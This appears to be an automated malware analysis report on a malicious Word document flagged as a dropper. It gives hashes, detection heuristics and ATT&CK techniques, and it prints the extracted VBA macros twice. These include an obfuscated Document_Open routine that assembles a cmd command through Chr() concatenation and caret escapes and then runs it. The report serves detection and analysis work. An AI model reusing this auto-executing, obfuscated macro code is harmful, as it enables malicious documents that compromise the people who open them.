Office (OLE) malware analysis — malicious · 2ff5fd04d482ffb3

MALICIOUS

Office (OLE)

250.2 KB Created: 2018-07-16 15:55:00 Authoring application: Microsoft Office Word First seen: 2019-01-20

MD5: e1d08fa2afef784cc2dcf1bdf434cb28 SHA-1: f8f83df476ae0f889315b7b081e866543aefe2e0 SHA-256: 2ff5fd04d482ffb3005210613ebe70fb3ce5fb4f71ee52d2b970adf14db50abf

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the macro is intended to execute external commands or download additional payloads. The ClamAV detection 'Doc.Dropper.Agent-6614044-0' further confirms its malicious nature as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6614044-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6614044-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53363 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	53363 bytes
SHA-256: `65b49ba4d91bf241120d6f2e5135b54b466abaea735733894c24931f18d8a009`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wdNftDs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fbshZptjIfCiop() BiHvM = 61628 - fQKCh * NWGsTi - vEtcbf * fvpfFU / KowwI / 62307 + bwGDD * PsbqO - fUzkfU * 64709 + nkbizN XSJiJ = 86279 - HjoDOH * CfwIbV - zEipp * miJiMr / CNwLp / 73434 + kwlliZ * dXffN - JXOfp * 38161 + AZZJq UmlbT = 48892 - EjsSI * wdRDZP - AcbQTd * uFobam / uJYPN / 98004 + kjYivu * zYucM - TsKVI * 81766 + OzsQrV zQBoi = 34038 - AFsSVP * SSoqI - ANIoXc * wYpKkn / lCRKiM / 29682 + udYMZ * XLSErU - mHMRG * 70864 + cPhihT UtoMQ = 52241 - vDlXi * vjtzN - EBwCG * BlloI / aVNifF / 32113 + oDwGjl * lTSzR - wVAVqi * 78176 + piHvz mojmSp = 62611 - BSsKQ * IKiwz - MizTWW * oKYcuH / hpqsMX / 41132 + WvmiDc * OvKqhY - oNQwE * 84678 + cqwCc End Function Private Sub Document_open() On Error Resume Next jHKmoH = (kRGGa - nGwNSJ * 75578 * wHKtt - blwZCf - pbqvJ + 68391 * wcrLcw) + WZKwi / akzAtu * awVhE * hwfIRJ twoRRu = (cfuNmM - TXTjn * 14047 * XNniU - Gtlwv - aJqzvQ + 99621 * lqFcwf) + FJUppK / VjBizq * iuwSCm * dXYQn zHEMv = (zojYMA - hmzMND * 50359 * KwLGV - bXVzfm - mGQYpG + 6254 * SzlIl) + jHQLk / qnLsG * EYROZ * OGvfjo kNfjAf = (VilPSW - bWsRjJ * 54674 * cujwS - wjbkQA - wzDdd + 22693 * KPzqz) + wYTasj / VlkzD * BYwJi * VGdZo DROuMm = (MFrjh - NurmTw * 18654 * rpbQDr - XEbbN - nzfusE + 36427 * dKrQX) + rsTMJ / FMcndI * qpBPIT * avMrb BkKsppA = Application.Run("iijVoSLk", "" + TQwRwME + bYojEbqCONMz + CVar("c") + HhParRtp + WQjBbwJVmkFfG + DatHjiZnI + EmXtHMkS + fuaTWwRhiB + dlzVImAOnc + CsfCDP + ETYvhRuD + CdHEAmq + vHstA + jVQvFWZAs + FOUUIZF + FJJOjQ + PiYXpSYu + qZnoI + OKIwLOHsF + BOlwzVKr + ablIASYpN + VZlEdt + YBkfRjJ + ViwfLbqiNK + RIbwam + XJJQCDc + kXiwDvn + TPASCaspE + kpuPBiAcN + PbUzYs + aFPNEdIEsY + qrwZzjVrPE + ZvwvXRPCiHEaEu) dMojUj = (AiQiX - BDfzdN * 16744 * dbQYaV - iscop - lnYOW + 18706 * jwBQG) + BXwbO / jwzlY * tKSRp * qhOPQG HNjZu = (siDvjW - jVUMk * 61802 * nGAmjE - MBlAFh - EsvUD + 76718 * KtLCP) + dMSUV / wPANzq * fjhSvd * DbdZsj DXcno = (zvOSJq - jBJmmo * 20869 * jLWIus - nWVCEz - sbzGiw + 5889 * EIYUzG) + nRGUbT / GftwQ * szHml * JhmjGO End Sub Function zCiZzSV() iHJNwM = (BJbGt - KFWXiG * 54871 * QrKzN - LzXYW - ClwjrO + 40512 * KPGvUJ) + bQVkNL / RPzQlK * EmDjv * ZIqjT KhsnlR = (wqQjaB - DrvimO * 23618 * SYssk - CYNTwz - HjuRk + 86721 * bodwfY) + MINzj / KOTus * nuSDPi * rvKAR vBlOcD = (kjBnJn - Thjac * 20673 * FcDLZk - SapQc - sQdlo + 65381 * SYkPaH) + FbJFq / RpZiCC * XSFMW * XWDDvl skMdK = (EwzAwt - QozVO * 13167 * MYjVY - AHmaSw - YiIMcv + 75629 * SqZLL) + nskQrq / wTDqEN * wMZhBO * mjntTT kRNVGX = (BzDdzs - INaYq * 73564 * rsHPl - UMZsYr - hYbUbr + 56619 * HjdEE) + WMYtih / sYFGU * RpaKEH * jklFz End Function Attribute VB_Name = "YdvwNMUpQAUP" Function DatHjiZnI() On Error Resume Next mRAZjX = (94712 * 1988) - (WIVQJ / 20470 / 80375 * zWLKbd) hjajb = (33868 * 92526) - (zhhcbj / 15135 / 59274 * SjQcq) USCzH = PDHDul * DCqKB + TwBjoz - UCWjt / qivEt - bDzzX - 67654 - SsJQT + 20764 / zdJTiN + 3866 + VMjXKp * uIzwCa - TwdAQf - LlDYwH / UcVfG BZCpdNo = CStr(Chr(KSXiIDdbGPCKNK + zBrWiXRBTYMC + 109 + BDIlLWvdcltPnQ + hGtNUHkwUnAV)) + "d " + "/" + CStr(Chr(qaGHNzBbwunW + cOjAHmq + 99 + GduSKRYW + suTIfCufG)) + " " + "fO^" + "r , " + "/^F ; " + ", " + CStr(Chr(awifVFDzNctkRz + hrJaYNHjKJ + 34 + wNGjzKj + noMUWLmw)) + " de" + "li" + CStr(Chr(IBjNowh + qCUMzzBA + 109 + mHTwHtCz + CVhBHzC)) + "s=" nhjcXL = (76785 * 3720) - (BrWUr / 9828 / 23424 * RbcMHQ) uRwsPLw = "zWef " + "tok" + "ens= " + "+1 " + " " + CStr(Chr(RmQjToJ + MVULRoXupCb + 34 + zcYKVVTECznz + WXzJwaakjh)) + " ;" + " %" + "^F" tYdhZ = (60672 * 32097) - (vWCrU / 58471 / 19593 * GbCVz) Iwhir = (53208 * 31801) - (okMJbW / 88272 / 51872 * fQHpb) MCBabRPlzlG = " ; ;" + " in " + ", , " + "( " + ", '" + " , " + "," + " F" + "TYP" + ... (truncated)

SHA-256: 65b49ba4d91bf241120d6f2e5135b54b466abaea735733894c24931f18d8a009

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wdNftDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fbshZptjIfCiop()
   BiHvM = 61628 - fQKCh * NWGsTi - vEtcbf * fvpfFU / KowwI / 62307 + bwGDD * PsbqO - fUzkfU * 64709 + nkbizN
   XSJiJ = 86279 - HjoDOH * CfwIbV - zEipp * miJiMr / CNwLp / 73434 + kwlliZ * dXffN - JXOfp * 38161 + AZZJq
   UmlbT = 48892 - EjsSI * wdRDZP - AcbQTd * uFobam / uJYPN / 98004 + kjYivu * zYucM - TsKVI * 81766 + OzsQrV
   zQBoi = 34038 - AFsSVP * SSoqI - ANIoXc * wYpKkn / lCRKiM / 29682 + udYMZ * XLSErU - mHMRG * 70864 + cPhihT
   UtoMQ = 52241 - vDlXi * vjtzN - EBwCG * BlloI / aVNifF / 32113 + oDwGjl * lTSzR - wVAVqi * 78176 + piHvz
   mojmSp = 62611 - BSsKQ * IKiwz - MizTWW * oKYcuH / hpqsMX / 41132 + WvmiDc * OvKqhY - oNQwE * 84678 + cqwCc
End Function
Private Sub Document_open()
On Error Resume Next
   jHKmoH = (kRGGa - nGwNSJ * 75578 * wHKtt - blwZCf - pbqvJ + 68391 * wcrLcw) + WZKwi / akzAtu * awVhE * hwfIRJ
   twoRRu = (cfuNmM - TXTjn * 14047 * XNniU - Gtlwv - aJqzvQ + 99621 * lqFcwf) + FJUppK / VjBizq * iuwSCm * dXYQn
   zHEMv = (zojYMA - hmzMND * 50359 * KwLGV - bXVzfm - mGQYpG + 6254 * SzlIl) + jHQLk / qnLsG * EYROZ * OGvfjo
   kNfjAf = (VilPSW - bWsRjJ * 54674 * cujwS - wjbkQA - wzDdd + 22693 * KPzqz) + wYTasj / VlkzD * BYwJi * VGdZo
   DROuMm = (MFrjh - NurmTw * 18654 * rpbQDr - XEbbN - nzfusE + 36427 * dKrQX) + rsTMJ / FMcndI * qpBPIT * avMrb
BkKsppA = Application.Run("iijVoSLk", "" + TQwRwME + bYojEbqCONMz + CVar("c") + HhParRtp + WQjBbwJVmkFfG + DatHjiZnI + EmXtHMkS + fuaTWwRhiB + dlzVImAOnc + CsfCDP + ETYvhRuD + CdHEAmq + vHstA + jVQvFWZAs + FOUUIZF + FJJOjQ + PiYXpSYu + qZnoI + OKIwLOHsF + BOlwzVKr + ablIASYpN + VZlEdt + YBkfRjJ + ViwfLbqiNK + RIbwam + XJJQCDc + kXiwDvn + TPASCaspE + kpuPBiAcN + PbUzYs + aFPNEdIEsY + qrwZzjVrPE + ZvwvXRPCiHEaEu)
   dMojUj = (AiQiX - BDfzdN * 16744 * dbQYaV - iscop - lnYOW + 18706 * jwBQG) + BXwbO / jwzlY * tKSRp * qhOPQG
   HNjZu = (siDvjW - jVUMk * 61802 * nGAmjE - MBlAFh - EsvUD + 76718 * KtLCP) + dMSUV / wPANzq * fjhSvd * DbdZsj
   DXcno = (zvOSJq - jBJmmo * 20869 * jLWIus - nWVCEz - sbzGiw + 5889 * EIYUzG) + nRGUbT / GftwQ * szHml * JhmjGO
End Sub
Function zCiZzSV()
   iHJNwM = (BJbGt - KFWXiG * 54871 * QrKzN - LzXYW - ClwjrO + 40512 * KPGvUJ) + bQVkNL / RPzQlK * EmDjv * ZIqjT
   KhsnlR = (wqQjaB - DrvimO * 23618 * SYssk - CYNTwz - HjuRk + 86721 * bodwfY) + MINzj / KOTus * nuSDPi * rvKAR
   vBlOcD = (kjBnJn - Thjac * 20673 * FcDLZk - SapQc - sQdlo + 65381 * SYkPaH) + FbJFq / RpZiCC * XSFMW * XWDDvl
   skMdK = (EwzAwt - QozVO * 13167 * MYjVY - AHmaSw - YiIMcv + 75629 * SqZLL) + nskQrq / wTDqEN * wMZhBO * mjntTT
   kRNVGX = (BzDdzs - INaYq * 73564 * rsHPl - UMZsYr - hYbUbr + 56619 * HjdEE) + WMYtih / sYFGU * RpaKEH * jklFz
End Function


Attribute VB_Name = "YdvwNMUpQAUP"
Function DatHjiZnI()
On Error Resume Next
mRAZjX = (94712 * 1988) - (WIVQJ / 20470 / 80375 * zWLKbd)
   hjajb = (33868 * 92526) - (zhhcbj / 15135 / 59274 * SjQcq)
   USCzH = PDHDul * DCqKB + TwBjoz - UCWjt / qivEt - bDzzX - 67654 - SsJQT + 20764 / zdJTiN + 3866 + VMjXKp * uIzwCa - TwdAQf - LlDYwH / UcVfG
BZCpdNo = CStr(Chr(KSXiIDdbGPCKNK + zBrWiXRBTYMC + 109 + BDIlLWvdcltPnQ + hGtNUHkwUnAV)) + "d " + "/" + CStr(Chr(qaGHNzBbwunW + cOjAHmq + 99 + GduSKRYW + suTIfCufG)) + " " + "fO^" + "r ,  " + "/^F ; " + ", " + CStr(Chr(awifVFDzNctkRz + hrJaYNHjKJ + 34 + wNGjzKj + noMUWLmw)) + " de" + "li" + CStr(Chr(IBjNowh + qCUMzzBA + 109 + mHTwHtCz + CVhBHzC)) + "s="
nhjcXL = (76785 * 3720) - (BrWUr / 9828 / 23424 * RbcMHQ)
uRwsPLw = "zWef " + "tok" + "ens= " + "+1  " + " " + CStr(Chr(RmQjToJ + MVULRoXupCb + 34 + zcYKVVTECznz + WXzJwaakjh)) + " ;" + "  %" + "^F"
tYdhZ = (60672 * 32097) - (vWCrU / 58471 / 19593 * GbCVz)
   Iwhir = (53208 * 31801) - (okMJbW / 88272 / 51872 * fQHpb)
MCBabRPlzlG = " ;  ;" + "  in " + ", ,  " + "( " + ",  '" + "  ,  " + "," + " F" + "TYP" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.